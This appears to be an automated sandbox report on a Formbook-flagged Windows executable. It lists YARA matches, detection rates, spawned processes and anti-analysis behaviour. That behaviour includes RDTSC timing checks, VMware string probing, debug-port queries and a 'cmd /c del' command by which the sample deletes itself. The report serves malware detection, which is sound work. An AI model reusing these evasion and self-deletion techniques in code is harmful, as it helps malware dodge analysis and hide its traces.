          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/3@16/10
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_01
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | File created: C:\Users\user\AppData\Local\Temp\nsa7684.tmp
          Source: WXs8v9QuE7.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: WXs8v9QuE7.exeVirustotal: Detection: 18%
          Source: WXs8v9QuE7.exeReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile read: C:\Users\user\Desktop\WXs8v9QuE7.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cscript.pdbUGP source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: WXs8v9QuE7.exe, 00000000.00000003.228184886.0000000009990000.00000004.00000001.sdmp, WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmp, cscript.exe, 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WXs8v9QuE7.exe, cscript.exe
          Source: Binary string: cscript.pdb source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Unpacked PE file: 1.2.WXs8v9QuE7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_100029F0 push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041624A pushad ; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0040B7D2 push ebx; retf
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AED0D1 push ecx; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_0041624A pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0057624A pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0057B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0057B47C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0057B412 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0057B41B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0056B7D2 push ebx; retf
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | File created: C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 1848 | Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 612 | Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.250033211.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.258894278.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
          Source: explorer.exe, 00000004.00000000.258969354.0000000001218000.00000004.00000020.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.250033211.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.261945560.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.258894278.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.250088865.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.268841101.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.250088865.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A99080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B61074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B52073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ABC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AB4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AA8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AB3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A95210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B68A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B24257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B65BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B4D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B5138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B5131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B68B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AA849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AB746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B1A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
